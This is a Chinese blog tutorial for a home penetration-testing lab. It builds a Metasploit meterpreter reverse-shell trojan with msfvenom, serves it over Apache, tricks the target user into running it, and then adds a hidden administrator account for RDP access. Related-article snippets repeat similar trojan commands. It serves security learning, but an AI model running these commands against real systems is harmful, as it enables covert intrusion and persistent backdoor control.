使用Metasploit生成木马控制Windows系统

最新推荐文章于 2024-07-18 21:54:23 发布
最新推荐文章于 2024-07-18 21:54:23 发布
阅读量2.2k 收藏 19
点赞数 2
文章标签: linux 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56956399/article/details/124125364
版权

一、环境准备

攻击机:kali     IP:192.168.63.53

靶机:Windows 7         IP:192.168.63.128

1、保证两台机器间可以互相ping通

 

2、关闭Windows防火墙、kali防火墙

二、kali生成木马

1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.63.53 lport=5555 -f exe >/home/ices/桌面/evilshell.exe

      参数解释:

-p -playload 攻击成功后做什么

-p ,-payload Payload to use:指定哪些有效载荷生成

-f, -format Output format:指定有效载荷的格式

  -f  后跟要生成后门文件的类型

      2、将木马文件evilshell.exe拷贝到/var/www/html,把html目录下的其余文件删除,并开启apache服务(提供一个可以把木马文件下载的平台)

cp evilshell.exe /var/www/html   拷贝木马文件到/var/www/html

rm -f index.html  删除index.html

rm -f insex.nginx-debian.html  删除index.html

3、在靶机上打开浏览器,访问站点http://192.168.63.53(kali的IP地址),并下载木马文件到桌面

4、开启postgresql服务,,postgresql的端口号为5432,开启MSF(msfconsole的缩写)

/etc/init.d/postgresql status  查看postgresql服务的状态

/etc/init.d/postgresql start  开启postgresql服务

netstat -ntulp  查看端口

msfconsole  开启MSF

5、加载exploits和payloads, 该模块需要设置的参数

msf5>use exploit/multi/handler 选择exploits

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload

show options  查看所需设置的参数

6、设置监听IP和端口,要与生成木马中的命令中的lhost和lport一致

set lhost 192.168.63.53  设置监听地址

set lport 5555  设置监听端口

run 或者exploit  运行攻击模块

7、在靶机中诱导用户点击exe程序(社会工程学攻击),在kali中就会得到靶机的shell(meterpreter)

Windows环境下中文乱码解决办法:chcp 437

8、在靶机中加入一个隐藏用户($),提升隐藏用户权限

(注:靶机需登录管理员账户,否则无法添加成功)

net user host$ /add  添加隐藏用户host$

net user  查看用户

net user host$ 密码  为host$用户设置密码

net localgroup administrators host$ /add  将host$用户加入到管理员组中,从而提升权限

net user host$  查看host$用户信息

9、新打开一个终端,使用远程桌面连接靶机,进行操作

rdesktop 192.168.63.128

              连接失败的原因:靶机没有允许远程连接

           

      重新连接靶机,连接成功,使用隐藏用户登录靶机

     

     

进入远程桌面

呆懵的萌呆
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit 生成木马
2201_75516783的博客
11-28 775
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windowslinux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 1017
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
内网渗透测试:内网横向移动基础总结
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 157
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
Metasploit -- 木马生成原理和方法
weixin_41489908的博客
05-07 2206
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
Metasploit(MSF)生成木马教程,一次windows入侵记录(教程)
最新发布
weixin_62860907的博客
07-18 253
打开靶机(我使用的是中国蚁剑,靶机中我上传了后门,上传了生成木马5E.exe)第二部,生成木马,设置攻击机的IP地址以及接收shell的端口。我也是初学这,进去之后都不知道该干嘛,提权什么的,一概不会。第三步,开启msf控制台,设置payload,开启监听。首先查看一下IP地址吧。上线成功,拍张照片看看。
Metasploit的简单木马免杀技术及后渗透面临的问题
Grey的博客
04-17 1678
一. 配置ngrok准备内网穿透内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:https://ngrok.com/。我注册的时候面临验证码刷不出来,所以建议选择用github账号登陆就好。登陆好之后就在kali下载好对应版本的客户端。下载好之后你需要在kali上用他给你的凭证进行登...
木马与免杀(1), msfvenom 工具, 木马生成, 编码免杀, 在线木马检测
探测???
12-06 831
Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错[5]。
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
4. **生成最终木马**: 使用 `generate` 命令生成可执行文件,可以是 WindowsLinux 或其他系统的二进制文件。 ### 三、木马捆绑 1. **选择捆绑工具**: Metasploit 自身并不提供捆绑工具,但可以结合其他工具,如 ...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
metasploit中文使用详解.pdf
08-14
### Metasploit中文使用详解 #### 一、Metasploit简介 Metasploit是一款非常知名的开源安全漏洞检测工具。作为一款免费工具,Metasploit被广泛应用于网络安全领域,特别是用于评估系统安全性的强度。该框架自2003...
technowhorse:TechNowHorse是使用Python 3编写的WindowsLinux系统的RAT(远程管理员木马生成
02-06
TechNowHorse是用于以Python 3编写的Windows / Linux系统的RAT(远程管理员木马生成器。 This small python script can do really awesome work. 免责声明 :laptop: 该项目仅出于良好目的和个人用途而创建。 ...
KalilMetasploit生成cmdshell(未免杀)
tiaotiaolong99234的博客
05-30 926
众所周知,Metasploit是一款开源的安全漏洞检测工具,这个框架并不仅仅局限于Linux上,在windows上同样可以大放光彩,但是由于在windows上的安装稍有点麻烦,并且Kali也早已经将其集成在自己的OS中,所以很多安全人士也依赖于在Kali上将Metasploit作为自己的重要工具。       其上集成了相当多的漏洞利用,以及ShellCode(PAYLOAD) 并且拥
metasploit制作木马程序
Chaos
11-15 2207
第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:   1)百度搜索,下载原版putty程序   2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty
渗透测试/应急演练过程中metasploit制作木马连接失败问题排查
weixin_40111182的博客
07-07 3073
声明:本文仅供学习交流,恶意人员请绕路, msf木马制作 网上有很多教程,比较简单,大致说下步骤: 1 生成木马 在kali控制台输入: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe -p 参数后跟上payload(载体),攻击成功之后,要做什么事情 LHOST 后跟监听的IP,kali的ip LPORT 后跟监听
kali之metasploit工具渗透案例 --- 小黑超细详解
G_WEB_Xie的博客
09-12 1865
metasploit简称(MSF),是kali的最强渗透工具之一,称之为能黑掉整个宇宙的工具。在之前的文章中详细介绍了MSF工具的使用以及各个模块的说明,这篇文章作为案例做一次详解。
kali 反弹shell 远程操作Windows
天码行空的码的博客
05-31 2710
一、在kali终端执行下面命令,生成木马。 反向链接有多种协议: payload:/windows/meterpreter/reverse_http payload:/windows/meterpreter/reverse_https msfvenom -p windows/meterpreter/reverse_tcp LHOST=...
Kali渗透测试:远程控制程序基础
Liu_Bruce的博客
05-07 3642
Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206) 1. 使用MSFPC生成被控端 远程控制软件中的被控端和主控端必须是成对使用的。被控端运行在目标设备上,其功能挺起来和木马很像,实际上是如此,被控端(可以是一段代码,也可以是一个能直接执行的程序)。在Kali Li
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
metasploit 木马 win10
08-12
Metasploit是一款功能强大的渗透测试工具,可以用于创建和管理各种类型的恶意软件,包括木马。对于在Windows 10系统使用Metasploit创建木马,您可以使用msfvenom来生成适用于Windows 10的恶意软件。 例如,您可以使用以下命令来生成一个适用于Windows 10系统的反向TCP木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win10-1.exe 这个命令将生成一个名为win10-1.exe的可执行文件,其中包含一个反向TCP木马。通过将此木马传递给目标系统,并确保您的监听器配置正确,您可以在目标系统上建立一个与Metasploit的反向连接,以便执行各种操作,如查看目标的桌面、监听麦克风、打开摄像头等。请注意,创建和使用恶意软件可能是非法的,只能在合法的渗透测试或授权的安全测试中使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [6. MetasploitMetasploit木马](https://blog.csdn.net/qq_41860876/article/details/105627201)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值